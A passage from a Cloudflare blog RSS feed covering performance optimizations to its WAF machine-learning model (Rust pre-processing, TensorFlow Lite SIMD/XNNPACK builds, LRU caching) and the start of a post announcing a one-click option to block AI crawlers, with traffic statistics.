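fn ngram_index(offsets: &[[u32; 256]; 3], ngram: [u8; 3]) -> usize {
    (offsets[0][ngram[0] as usize]
        + offsets[1][ngram[1] as usize]
        + offsets[2][ngram[2] as usize]) as usize
}
```

<p>Because the index is a base-n positional encoding of the three ranks, the resulting dense index space has at most n³ entries, which is what keeps the real lookup arrays down to ~500 KiB.</p>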
            <p>This logic works effectively, passes correctness tests, and most importantly, it's completely branchless! Moreover, the memory footprint of the lookup arrays is tiny – just ~500 KiB – which easily fits into modern CPU L2/L3 caches, ensuring that expensive cache misses are rare and performance is optimal.</p><p>The last trick we employ is loop unrolling for ngram processing. By processing 6 ngrams (corresponding to 8 bytes of the input array) at a time, we let the compiler unroll the inner loop and auto-vectorize it, leveraging parallel execution to improve performance:</p>
            <pre><code>const CHUNK_SIZE: usize = 6;

let chunks_max_offset =
    ((input.len().saturating_sub(2)) / CHUNK_SIZE) * CHUNK_SIZE;
for i in (0..chunks_max_offset).step_by(CHUNK_SIZE) {
    for ngram in input[i..i + CHUNK_SIZE + 2].windows(3) {
        update_tensor_with_ngram(tensor, ngram.try_into().unwrap());
    }
}</code></pre>
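<p>One subtlety of the chunked loop is the tail: any windows starting after the last full chunk still need a plain scalar pass. As a self-contained sketch (using an illustrative counting function in place of the real tensor update), the full chunks plus the tail together visit exactly len − 2 overlapping 3-grams:</p>

```rust
// Illustrative sketch of the chunked iteration plus tail handling.
// Counts 3-byte windows instead of updating a tensor.
fn count_ngrams_chunked(input: &[u8]) -> usize {
    const CHUNK_SIZE: usize = 6;
    let mut count = 0;
    let chunks_max_offset =
        (input.len().saturating_sub(2) / CHUNK_SIZE) * CHUNK_SIZE;
    for i in (0..chunks_max_offset).step_by(CHUNK_SIZE) {
        // Each 8-byte slice yields exactly CHUNK_SIZE overlapping 3-grams.
        count += input[i..i + CHUNK_SIZE + 2].windows(3).count();
    }
    // Tail: windows that start after the last full chunk.
    if input.len() >= 3 {
        count += input[chunks_max_offset..].windows(3).count();
    }
    count
}
```

<p>For any input of length L ≥ 3 this yields L − 2 windows in total, matching what a single un-chunked <code>windows(3)</code> pass would produce.</p>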
            <p>Tying up everything together, our final pre-processing benchmarks show the following:</p>
<table><thead>
  <tr>
    <th><span>Benchmark case</span></th>
    <th><span>Baseline time, μs</span></th>
    <th><span>Branchless time, μs</span></th>
    <th><span>Optimization</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>preprocessing/long-body-9482</span></td>
    <td><span>248.46</span></td>
    <td><span>21.53</span></td>
    <td><span>-91.33% or 11.54x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-body-1000</span></td>
    <td><span>28.19</span></td>
    <td><span>2.33</span></td>
    <td><span>-91.73% or 12.09x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-url-44</span></td>
    <td><span>1.45</span></td>
    <td>	<span>0.26</span></td>
    <td><span>-82.34% or 5.66x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-ua-91</span></td>
    <td><span>2.87</span></td>
    <td>	<span>0.43</span></td>
    <td><span>-84.92% or 6.63x</span></td>
  </tr>
</tbody></table><p>The longer the input, the larger the latency drop from branchless ngram lookups and loop unrolling, ranging from <b>six to twelve times faster</b> than the baseline implementation.</p><p>After trying various optimizations, the final version of pre-processing retains optimization attempts 3 and 4, using branchless ngram lookup with offset tables and a single-pass non-allocating replacement iterator.</p><p>There are potentially more CPU cycles left on the table, and techniques like memory pre-fetching and manual SIMD intrinsics could speed this up a bit further. However, let's now switch gears and look more closely at inference latency.</p>
    <div>
      <h2>Model inference optimizations</h2>
      <a href="#model-inference-optimizations">
        
      </a>
    </div>
    
    <div>
      <h3>Initial benchmarks</h3>
      <a href="#initial-benchmarks">
        
      </a>
    </div>
    <p>Let’s have a look at the original performance numbers of the WAF Attack Score ML model, which uses <a href="https://github.com/tensorflow/tensorflow/releases/tag/v2.6.0">TensorFlow Lite 2.6.0</a>:</p>
<table><thead>
  <tr>
    <th><span>Benchmark case</span></th>
    <th><span>Inference time, μs</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>inference/long-body-9482</span></td>
    <td><span>247.31</span></td>
  </tr>
  <tr>
    <td><span>inference/avg-body-1000</span></td>
    <td><span>246.31</span></td>
  </tr>
  <tr>
    <td><span>inference/avg-url-44</span></td>
    <td><span>246.40</span></td>
  </tr>
  <tr>
    <td><span>inference/avg-ua-91</span></td>
    <td><span>246.88</span></td>
  </tr>
</tbody></table><p>Model inference is actually independent of the original input length, as inputs are transformed into tensors of predetermined size during the pre-processing phase, which we optimized above. From now on, we will refer to a single inference time when benchmarking our optimizations.</p><p>Digging deeper with a profiler, we observed that most of the time is spent on the following operations:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3uy64gatRk8PfdnpRz5Xm5/0d3da469c30e5941524289c1b13574c5/unnamed--6--6.png" />
            
            </figure>
<table><thead>
  <tr>
    <th><span>Function name</span></th>
    <th><span>% Time spent</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>tflite::tensor_utils::PortableMatrixBatchVectorMultiplyAccumulate</span></td>
    <td><span>42.46%</span></td>
  </tr>
  <tr>
    <td><span>tflite::tensor_utils::PortableAsymmetricQuantizeFloats</span></td>
    <td><span>30.59%</span></td>
  </tr>
  <tr>
    <td><span>tflite::optimized_ops::SoftmaxImpl</span></td>
    <td><span>12.02%</span></td>
  </tr>
  <tr>
    <td><span>tflite::reference_ops::MaximumMinimumBroadcastSlow</span></td>
    <td><span>5.35%</span></td>
  </tr>
  <tr>
    <td><span>tflite::ops::builtin::elementwise::LogEval</span></td>
    <td><span>4.13%</span></td>
  </tr>
</tbody></table><p>The most expensive operation is matrix multiplication, which boils down to iteration within <a href="https://github.com/tensorflow/tensorflow/blob/v2.6.0/tensorflow/lite/kernels/internal/reference/portable_tensor_utils.cc#L119-L136">three nested loops</a>:</p>
            <pre><code>void PortableMatrixBatchVectorMultiplyAccumulate(const float* matrix,
                                                 int m_rows, int m_cols,
                                                 const float* vector,
                                                 int n_batch, float* result) {
  float* result_in_batch = result;
  for (int b = 0; b &lt; n_batch; b++) {
    const float* matrix_ptr = matrix;
    for (int r = 0; r &lt; m_rows; r++) {
      float dot_prod = 0.0f;
      const float* vector_in_batch = vector + b * m_cols;
      for (int c = 0; c &lt; m_cols; c++) {
        dot_prod += *matrix_ptr++ * *vector_in_batch++;
      }
      *result_in_batch += dot_prod;
      ++result_in_batch;
    }
  }
}</code></pre>
            <p>This doesn’t look very efficient, and many <a href="https://en.algorithmica.org/hpc/algorithms/matmul/">blogs</a> and <a href="https://www.cs.utexas.edu/~flame/pubs/GotoTOMS_revision.pdf">research papers</a> have been written on how matrix multiplication can be optimized. The techniques basically boil down to:</p><ul><li><p><b>Blocking</b>: Divide matrices into smaller blocks that fit into the cache, improving cache reuse and reducing memory access latency.</p></li><li><p><b>Vectorization</b>: Use SIMD instructions to process multiple data points in parallel, enhancing efficiency with vector registers.</p></li><li><p><b>Loop Unrolling</b>: Reduce loop control overhead and increase parallelism by executing multiple loop iterations simultaneously.</p></li></ul><p>To gain a better understanding of how these techniques work, we recommend watching this video, which brilliantly depicts the process of matrix multiplication:</p>
<p></p>
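<p>To make the blocking idea concrete, here is an illustrative cache-blocked multiply in Rust. This is not TensorFlow Lite code; the block size and names are arbitrary for the sketch, and real kernels layer SIMD and unrolling on top of blocking:</p>

```rust
// Cache-blocked matrix multiply: c += a * b for n x n row-major matrices,
// processed in B x B tiles so each tile stays resident in cache.
const B: usize = 8; // block size, chosen so tiles fit in L1/L2

fn matmul_blocked(a: &[f32], b: &[f32], c: &mut [f32], n: usize) {
    for ib in (0..n).step_by(B) {
        for kb in (0..n).step_by(B) {
            for jb in (0..n).step_by(B) {
                // Multiply one tile; .min(n) handles ragged edges.
                for i in ib..(ib + B).min(n) {
                    for k in kb..(kb + B).min(n) {
                        let aik = a[i * n + k];
                        for j in jb..(jb + B).min(n) {
                            c[i * n + j] += aik * b[k * n + j];
                        }
                    }
                }
            }
        }
    }
}
```

<p>Compared to the portable triple loop above, each tile of <code>b</code> is reused across a whole tile of rows of <code>a</code> before it is evicted, which is where the cache-reuse win comes from.</p>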
    <div>
      <h3>TensorFlow Lite with AVX2</h3>
      <a href="#tensorflow-lite-with-avx2">
        
      </a>
    </div>
    <p>TensorFlow Lite does, in fact, support SIMD matrix multiplication – we just need to enable it and re-compile the TensorFlow Lite library:</p>
            <pre><code>if [[ "$(uname -m)" == x86_64* ]]; then
    # On x86_64 target x86-64-v3 CPU to enable AVX2 and FMA.
    arguments+=("--copt=-march=x86-64-v3")
fi</code></pre>
            <p>After running profiler again using the SIMD-optimized TensorFlow Lite library:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6NmJhJoYG42ZZhU41m0Uj5/1d9fce45d44f98b41375d6a56f1a7cac/unnamed--7--5.png" />
            
            </figure><p>Top operations as per profiler output:</p>
<table><thead>
  <tr>
    <th><span>Function name</span></th>
    <th><span>% Time spent</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>tflite::tensor_utils::SseMatrixBatchVectorMultiplyAccumulateImpl</span></td>
    <td><span>43.01%</span></td>
  </tr>
  <tr>
    <td><span>tflite::tensor_utils::NeonAsymmetricQuantizeFloats</span></td>
    <td><span>22.46%</span></td>
  </tr>
  <tr>
    <td><span>tflite::reference_ops::MaximumMinimumBroadcastSlow</span></td>
    <td><span>7.82%</span></td>
  </tr>
  <tr>
    <td><span>tflite::optimized_ops::SoftmaxImpl</span></td>
    <td><span>6.61%</span></td>
  </tr>
  <tr>
    <td><span>tflite::ops::builtin::elementwise::LogEval</span></td>
    <td><span>4.63%</span></td>
  </tr>
</tbody></table><p>Matrix multiplication now uses <a href="https://github.com/tensorflow/tensorflow/blob/15ec568b5505727c940b651aeb2a9643b504086c/tensorflow/lite/kernels/internal/optimized/sse_tensor_utils.cc#L161-L199">AVX2 instructions</a>, which use 8x8 blocks to multiply and accumulate the result.</p><p>Proportionally, matrix multiplication and <a href="https://www.cloudflare.com/learning/ai/what-is-quantization/">quantization</a> operations take a similar share of time as in the non-SIMD version; however, in absolute numbers, inference is almost twice as fast with SIMD optimizations enabled:</p>
<table><thead>
  <tr>
    <th><span>Benchmark case</span></th>
    <th><span>Baseline time, μs</span></th>
    <th><span>SIMD time, μs</span></th>
    <th><span>Optimization</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>inference/avg-body-1000</span></td>
    <td><span>246.31</span></td>
    <td><span>130.07</span></td>
    <td><span>-47.19% or 1.89x</span></td>
  </tr>
</tbody></table><p>Quite a nice performance boost from just a few changed lines of build configuration!</p>
    <div>
      <h3>TensorFlow Lite with XNNPACK</h3>
      <a href="#tensorflow-lite-with-xnnpack">
        
      </a>
    </div>
    <p>TensorFlow Lite comes with a useful benchmarking tool called <a href="https://github.com/tensorflow/tensorflow/tree/master/tensorflow/lite/tools/benchmark">benchmark_model</a>, which also has a built-in profiler.</p><p>The tool can be built locally using the command:</p>
            <pre><code>bazel build -j 4 --copt=-march=native -c opt tensorflow/lite/tools/benchmark:benchmark_model</code></pre>
            <p>After building, benchmarks were run with different settings:</p>
<table><thead>
  <tr>
    <th><span>Benchmark run</span></th>
    <th><span>Inference time, μs</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>benchmark_model --graph=model.tflite --num_runs=100000 --use_xnnpack=false</span></td>
    <td><span>105.61</span></td>
  </tr>
  <tr>
    <td><span>benchmark_model --graph=model.tflite --num_runs=100000 --use_xnnpack=true --xnnpack_force_fp16=true</span></td>
    <td><span>111.95</span></td>
  </tr>
  <tr>
    <td><span>benchmark_model --graph=model.tflite --num_runs=100000 --use_xnnpack=true</span></td>
    <td><span>49.05</span></td>
  </tr>
</tbody></table><p>TensorFlow Lite with XNNPACK enabled emerges as the leader, achieving a ~50% latency reduction compared to the original TensorFlow Lite implementation.</p><p>More technical details about XNNPACK can be found in these blog posts:</p><ul><li><p><a href="https://blog.tensorflow.org/2022/06/Profiling-XNNPACK-with-TFLite.html">Profiling XNNPACK with TFLite</a></p></li><li><p><a href="https://blog.tensorflow.org/2024/04/faster-dynamically-quantized-inference-with-xnnpack.html">Faster Dynamically Quantized Inference with XNNPack</a></p></li></ul><p>Re-running benchmarks with XNNPACK enabled, we get the following results:</p>
<table><thead>
  <tr>
    <th><span>Benchmark case</span></th>
    <th><span>Baseline time, μs</span><br /><span>TFLite 2.6.0</span></th>
    <th><span>SIMD time, μs</span><br /><span>TFLite 2.6.0</span></th>
    <th><span>SIMD time, μs</span><br /><span>TFLite 2.16.1</span></th>
    <th><span>SIMD + XNNPack time, μs</span><br /><span>TFLite 2.16.1</span></th>
    <th><span>Optimization</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>inference/avg-body-1000</span></td>
    <td><span>246.31</span></td>
    <td><span>130.07</span></td>
    <td><span>115.17</span></td>
    <td><span>56.22</span></td>
    <td><span>-77.17% or 4.38x</span></td>
  </tr>
</tbody></table><p>By upgrading TensorFlow Lite from 2.6.0 to 2.16.1 and enabling SIMD optimizations along with XNNPACK, we were able to decrease WAF ML model inference time more than <b>four-fold</b>, achieving a <b>77.17%</b> reduction.</p>
    <div>
      <h2>Caching inference result</h2>
      <a href="#caching-inference-result">
        
      </a>
    </div>
    <p>While making code faster through pre-processing and inference optimizations is great, it's even better when code doesn't need to run at all. This is where caching comes in. <a href="https://en.wikipedia.org/wiki/Amdahl%27s_law">Amdahl's Law</a> suggests that optimizing only parts of a program has diminishing returns. By avoiding redundant executions with caching, we can achieve significant performance gains beyond the limitations of traditional code optimization.</p><p>A simple key-value cache would quickly occupy all available memory on the server due to the high cardinality of URLs, HTTP headers, and HTTP bodies. However, because "everything on the Internet has an L-shape", or, more specifically, follows a <a href="https://en.wikipedia.org/wiki/Zipf%27s_law">Zipf's law</a> distribution, we can optimize our caching strategy.</p><p><a href="https://en.wikipedia.org/wiki/Zipf%27s_law">Zipf's law</a> states that in many natural datasets, the frequency of any item is inversely proportional to its rank in the frequency table. In other words, a few items are extremely common, while the majority are rare. By analyzing our request data, we found that URLs, HTTP headers, and even HTTP bodies follow this distribution. For example, here is the user agent header frequency distribution against its rank:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/50OWcB7Buza1Jp77ePY75X/e25e66e7665fccc454df026e5ca37729/unnamed--8--3.png" />
            
            </figure><p>By caching the top-N most frequently occurring inputs and their corresponding inference results, we can ensure that both pre-processing and inference are skipped for the majority of requests. This is where the <a href="https://en.wikipedia.org/wiki/Cache_replacement_policies#LRU">Least Recently Used (LRU)</a> cache comes in – frequently used items stay hot in the cache, while the least recently used ones are evicted.</p><p>We use <a href="https://github.com/openresty/lua-resty-lrucache">lua-resty-mlcache</a> as our caching solution, allowing us to share cached inference results between different Nginx workers via a shared memory dictionary. The LRU cache effectively exploits the <a href="https://en.wikipedia.org/wiki/Space%E2%80%93time_tradeoff">space-time trade-off</a>, where we trade a small amount of memory for significant CPU time savings.</p><p>This approach enables us to achieve a <b>~70%</b> cache hit ratio, significantly reducing latency further, as we will analyze in the final section below.</p>
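<p>The mechanics of an LRU cache keyed by a hash of the input can be sketched as follows. This is a toy illustration only (the production system shares a memory dictionary across Nginx workers via Lua); the names are hypothetical, and eviction here is an O(n) scan over timestamps, which is fine for a sketch but not for a hot path:</p>

```rust
use std::collections::HashMap;

// Toy LRU cache for inference results, keyed by a hash of the input.
// Each entry carries a "last used" tick; the oldest tick is evicted.
struct LruCache {
    map: HashMap<u64, (f32, u64)>, // key -> (score, last-used tick)
    cap: usize,
    tick: u64,
}

impl LruCache {
    fn new(cap: usize) -> Self {
        Self { map: HashMap::new(), cap, tick: 0 }
    }

    fn get(&mut self, key: u64) -> Option<f32> {
        self.tick += 1;
        let tick = self.tick;
        // A hit refreshes the entry's recency.
        self.map.get_mut(&key).map(|e| {
            e.1 = tick;
            e.0
        })
    }

    fn put(&mut self, key: u64, score: f32) {
        self.tick += 1;
        if self.map.len() >= self.cap && !self.map.contains_key(&key) {
            // Evict the least recently used entry (O(n) scan; sketch only).
            let evict = self.map.iter().min_by_key(|(_, v)| v.1).map(|(&k, _)| k);
            if let Some(k) = evict {
                self.map.remove(&k);
            }
        }
        self.map.insert(key, (score, self.tick));
    }
}
```

<p>With a Zipf-distributed key stream, the hot head of the distribution stays resident, which is why a modest cache capacity is enough to reach a ~70% hit ratio.</p>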
    <div>
      <h2>Optimization results</h2>
      <a href="#optimization-results">
        
      </a>
    </div>
    <p>The optimizations discussed in this post were rolled out in several phases to ensure system correctness and stability.</p><p>First, we enabled SIMD optimizations for TensorFlow Lite, which reduced WAF ML total execution time by approximately <b>41.80%,</b> decreasing from <b>1519</b> ➔ <b>884 μs</b> on average.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/15SMdamloYpjyUy5ZwH9o0/ab4ec787f870d27a45ff513db1f696c8/unnamed--9--3.png" />
            
            </figure><p>Next, we upgraded TensorFlow Lite from version 2.6.0 to 2.16.1, enabled XNNPACK, and implemented pre-processing optimizations. This further reduced WAF ML total execution time by <b>~40.77%</b>, bringing it down from <b>932</b> ➔ <b>552 μs</b> on average. The starting point of 932 μs was slightly higher than the earlier 884 μs because more customers had adopted the feature in the months between the two rollouts.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/01EuBB1eVopVjUjWsVvwrK/0d908285bd4296d75f5c98918cf1a561/unnamed--10--3.png" />
            
            </figure><p>Lastly, we introduced LRU caching, which led to an additional reduction in WAF ML total execution time by <b>~50.18%</b>, from <b>552</b> ➔ <b>275 μs</b> on average.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6epSwp5jz4ZMaVfdwahZnN/8c23c1b6a90bf301f9e7f6566d4f3295/unnamed--11--3.png" />
            
            </figure><p>Overall, we cut WAF ML execution time by <b>~81.90%</b>, decreasing from <b>1519</b> ➔ <b>275 μs</b>, or <b>5.5x</b> faster!</p><p>To illustrate the significance of this: with Cloudflare’s average rate of 9.5 million requests per second passing through WAF ML, saving <b>1244 microseconds</b> per request equates to saving ~<b>32 years</b> of processing time every single day! That’s in addition to the savings of <b>523 microseconds</b> per request or <b>65 years</b> of processing time per day demonstrated last year in our <a href="/scalable-machine-learning-at-cloudflare">Every request, every microsecond: scalable machine learning at Cloudflare</a> post about our Bot Management product.</p>
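<p>The savings arithmetic above can be sanity-checked with a few lines (a hypothetical helper, using 365.25-day years):</p>

```rust
// Convert per-request savings into CPU-years saved per day.
// rps: requests per second; saved_us: microseconds saved per request.
fn saved_cpu_years_per_day(rps: f64, saved_us: f64) -> f64 {
    let saved_seconds_per_day = rps * (saved_us * 1e-6) * 86_400.0;
    saved_seconds_per_day / (365.25 * 86_400.0) // seconds in a year
}
```

<p>Plugging in 9.5 million requests per second and 1244 μs saved per request gives roughly 32 CPU-years of processing time saved per day, consistent with the figure quoted above.</p>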
    <div>
      <h2>Conclusion</h2>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>We hope you enjoyed reading about how we made our WAF ML models go brrr, just as much as we enjoyed implementing these optimizations to bring scalable WAF ML to more customers on a truly global scale.</p><p>Looking ahead, we are developing even more sophisticated ML security models. These advancements aim to bring our <a href="https://www.cloudflare.com/application-services/products/waf/">WAF</a> and <a href="https://www.cloudflare.com/application-services/products/bot-management/">Bot Management</a> products to the next level, making them even more useful and effective for our customers.</p> ]]></content:encoded>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Performance]]></category>
            <category><![CDATA[Optimization]]></category>
            <category><![CDATA[Rust]]></category>
            <category><![CDATA[AI WAF]]></category>
            <category><![CDATA[WAF Attack Score]]></category>
            <guid isPermaLink="false">6y0Im81Uj2lKntznfYHfUY</guid>
            <dc:creator>Alex Bocharov</dc:creator>
        </item>
        <item>
            <title><![CDATA[Declare your AIndependence: block AI bots, scrapers and crawlers with a single click]]></title>
            <link>https://blog.cloudflare.com/declaring-your-aindependence-block-ai-bots-scrapers-and-crawlers-with-a-single-click/</link>
            <pubDate>Wed, 03 Jul 2024 13:00:26 GMT</pubDate>
            <description><![CDATA[ To help preserve a safe Internet for content creators, we’ve just launched a brand new “easy button” to block all AI bots. It’s available for all customers, including those on our free tier ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/D59Fq5QkC4J7Jjo5lM4Fm/fcc55b665562d321bd84f88f53f46b22/image7-1.png" />
            
            </figure><p>To help preserve a safe Internet for content creators, we’ve just launched a brand new “easy button” to <a href="https://www.cloudflare.com/learning/ai/how-to-block-ai-crawlers/">block all AI bots</a>. It’s available for all customers, including those on our free tier.</p><p>The popularity of <a href="https://www.cloudflare.com/learning/ai/what-is-generative-ai/">generative AI</a> has made demand skyrocket for content used to train models or run inference on, and, although some AI companies clearly identify their web scraping bots, not all AI companies are being transparent. Google reportedly <a href="https://www.reuters.com/technology/reddit-ai-content-licensing-deal-with-google-sources-say-2024-02-22/">paid $60 million a year</a> to license Reddit’s user-generated content, and most recently, Perplexity has been <a href="https://rknight.me/blog/perplexity-ai-is-lying-about-its-user-agent/">accused of impersonating legitimate visitors</a> in order to scrape content from websites. The value of original content in bulk has never been higher.</p><p>Last year, <a href="/ai-bots">Cloudflare announced the ability for customers to easily block AI bots</a> that behave well. These bots follow <a href="https://www.cloudflare.com/learning/bots/what-is-robots-txt/">robots.txt</a>, and don’t use unlicensed content to train their models or run inference for <a href="https://blogs.nvidia.com/blog/what-is-retrieval-augmented-generation/">RAG</a> applications using website data. Even though these AI bots follow the rules, Cloudflare customers overwhelmingly opt to <a href="https://www.cloudflare.com/learning/ai/how-to-prevent-web-scraping/">block them</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5aAA77Hl9OM2vtI611QcUI/0992e096262e348b451efd8be296fa27/image9.png" />
            
            </figure><p>We hear clearly that customers don’t want AI bots visiting their websites, especially those that do so dishonestly. To help, we’ve added a brand new one-click option to block all AI bots. It’s available for all customers, including those on the free tier. To enable it, simply navigate to the <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/bots/configure">Security &gt; Bots</a> section of the Cloudflare dashboard, and click the toggle labeled AI Scrapers and Crawlers.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/xD0lhy89vZb34dtIWukt1/3e0e1ed979a33d344e53d4da2a819e1e/image2.png" />
            
            </figure><p>This feature will automatically be updated over time as we see new fingerprints of offending bots we identify as widely scraping the web for model training. To ensure we have a comprehensive understanding of all AI crawler activity, we surveyed traffic across our network.</p>
    <div>
      <h3>AI bot activity today</h3>
      <a href="#ai-bot-activity-today">
        
      </a>
    </div>
    <p>The graph below illustrates the most popular AI bots seen on Cloudflare’s network in terms of their request volume. We looked at common AI crawler user agents and aggregated the number of requests on our platform from these AI user agents over the last year:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/13pNq4MJJB92Dcs1ghxC6k/b7e7acc7e65e9e0958eed5d4b4cb0594/image6.png" />
            
            </figure><p>When looking at the number of requests made to Cloudflare sites, we see that <i>Bytespider</i>, <i>Amazonbot</i>, <i>ClaudeBot</i>, and <i>GPTBot</i> are the top four AI crawlers. Operated by ByteDance, the Chinese company that owns TikTok, <i>Bytespider</i> is reportedly used to gather training data for its large language models (LLMs), including those that support its ChatGPT rival, Doubao. <i>Amazonbot</i> and <i>ClaudeBot</i> follow <i>Bytespider</i> in request volume. <i>Amazonbot</i>, reportedly used to index content for Alexa’s question-answering, sent the second-most number of requests and <i>ClaudeBot</i>, used to train the Claude chat bot, has recently increased in request volume.</p><p>Among the top AI bots that we see, <i>Bytespider</i> not only leads in terms of number of requests but also in both the extent of its Internet property crawling and the frequency with which it is blocked. Following closely is <i>GPTBot</i>, which ranks second in both crawling and being blocked. <i>GPTBot</i>, managed by OpenAI, collects training data for its LLMs, which underpin AI-driven products such as ChatGPT. In the table below, “Share of websites accessed” refers to the proportion of websites protected by Cloudflare that were accessed by the named AI bot.</p>
<table><thead>
  <tr>
    <th><span>AI Bot</span></th>
    <th><span>Share of Websites Accessed</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>Bytespider</span></td>
    <td><span>40.40%</span></td>
  </tr>
  <tr>
    <td><span>GPTBot</span></td>
    <td><span>35.46%</span></td>
  </tr>
  <tr>
    <td><span>ClaudeBot</span></td>
    <td><span>11.17%</span></td>
  </tr>
  <tr>
    <td><span>ImagesiftBot</span></td>
    <td><span>8.75%</span></td>
  </tr>
  <tr>
    <td><span>CCBot</span></td>
    <td><span>2.14%</span></td>
  </tr>
  <tr>
    <td><span>ChatGPT-User</span></td>
    <td><span>1.84%</span></td>
  </tr>
  <tr>
    <td><span>omgili</span></td>
    <td><span>0.10%</span></td>
  </tr>
  <tr>
    <td><span>Diffbot</span></td>
    <td><span>0.08%</span></td>
  </tr>
  <tr>
    <td><span>Claude-Web</span></td>
    <td><span>0.04%</span></td>
  </tr>
  <tr>
    <td><span>PerplexityBot</span></td>
    <td><span>0.01%</span></td>
  </tr>
</tbody></table><p>While our analysis identified the most popular crawlers in terms of request volume and number of Internet properties accessed, many customers are likely not aware of the more popular AI crawlers actively crawling their sites. Our Radar team performed an analysis of the top robots.txt entries across the <a href="https://radar.cloudflare.com/domains">top 10,000 Internet domains</a> to identify the most commonly actioned AI bots, then looked at how frequently we saw these bots on sites protected by Cloudflare.</p><p>In the graph below, which looks at disallowed crawlers for these sites, we see that customers most often reference <i>GPTBot, CCBot</i>, and <i>Google</i> in robots.txt, but do not specifically disallow popular AI crawlers like <i>Bytespider</i> and <i>ClaudeBot</i>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6m4jV8g9sQ0BLR7OIonsoB/a4c3100a34160c96aea07c4ed4bc6a8d/image3.png" />
            
            </figure><p>With the Internet now flooded with these AI bots, we were curious to see how website operators have already responded. In June, AI bots accessed around 39% of the top one million Internet properties using Cloudflare, but only 2.98% of these properties took measures to block or challenge those requests. Moreover, the higher-ranked (more popular) an Internet property is, the more likely it is to be targeted by AI bots, and correspondingly, the more likely it is to block such requests.</p>
<table><thead>
  <tr>
    <th><span>Top N Internet properties by number of visitors seen by Cloudflare</span></th>
    <th><span>% accessed by AI bots</span></th>
    <th><span>% blocking AI bots</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>10</span></td>
    <td><span>80.0%</span></td>
    <td><span>40.0%</span></td>
  </tr>
  <tr>
    <td><span>100</span></td>
    <td><span>63.0%</span></td>
    <td><span>16.0%</span></td>
  </tr>
  <tr>
    <td><span>1,000</span></td>
    <td><span>53.2%</span></td>
    <td><span>8.8%</span></td>
  </tr>
  <tr>
    <td><span>10,000</span></td>
    <td><span>47.99%</span></td>
    <td><span>8.92%</span></td>
  </tr>
  <tr>
    <td><span>100,000</span></td>
    <td><span>44.53%</span></td>
    <td><span>6.36%</span></td>
  </tr>
  <tr>
    <td><span>1,000,000</span></td>
    <td><span>38.73%</span></td>
    <td><span>2.98%</span></td>
  </tr>
</tbody></table>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6gCWVJMv9GajRT3H8BQ5EM/effb5e2b52c0bdecb99f5f4e339c8d1d/image4.png" />
            
            </figure><p>We see website operators completely block access to these AI crawlers using robots.txt. However, these blocks are reliant on the bot operator respecting robots.txt and adhering to <a href="https://www.rfc-editor.org/rfc/rfc9309.html#name-the-user-agent-line">RFC9309</a> (ensuring variations on the user agent all match the product token) to honestly identify who they are when they visit an Internet property, but user agents are trivial for bot operators to change.</p>
    <div>
      <h3>How we find AI bots pretending to be real web browsers</h3>
      <a href="#how-we-find-ai-bots-pretending-to-be-real-web-browsers">
        
      </a>
    </div>
    <p>Sadly, we’ve observed bot operators attempt to appear as though they are a real browser by using a spoofed user agent. We’ve monitored this activity over time, and we’re proud to say that our global machine learning model has always recognized this activity as a bot, even when operators lie about their user agent.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4JpBRAGuQ1DOCTSFu9yHbH/9c11b569a30f68ddb1b4c197054ed1c8/image1.png" />
            
            </figure><p>Take one example of a specific bot that <a href="https://rknight.me/blog/perplexity-ai-is-lying-about-its-user-agent/">others</a> observed to be <a href="https://www.wired.com/story/perplexity-is-a-bullshit-machine/">hiding their activity</a>. We ran an analysis to see how our machine learning models scored traffic from this bot. In the diagram below, you can see that all <a href="https://developers.cloudflare.com/bots/concepts/bot-score/">bot scores</a> are firmly below 30, indicating that our scoring thinks this activity is likely to be coming from a bot.</p><p>The diagram reflects scoring of the requests using <a href="/residential-proxy-bot-detection-using-machine-learning">our newest model</a>, where “hotter” colors indicate more requests falling in that band, and “cooler” colors meaning fewer requests did. We can see the vast majority of requests fell into the bottom two bands, showing that Cloudflare’s model gave the offending bot a score of 9 or less. The user agent changes have no effect on the score, because this is the very first thing we expect bot operators to do.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1y0G6D2b512V1UAgR6sooD/4cc9b659f091e84facbec66a30baafad/image5.png" />
            
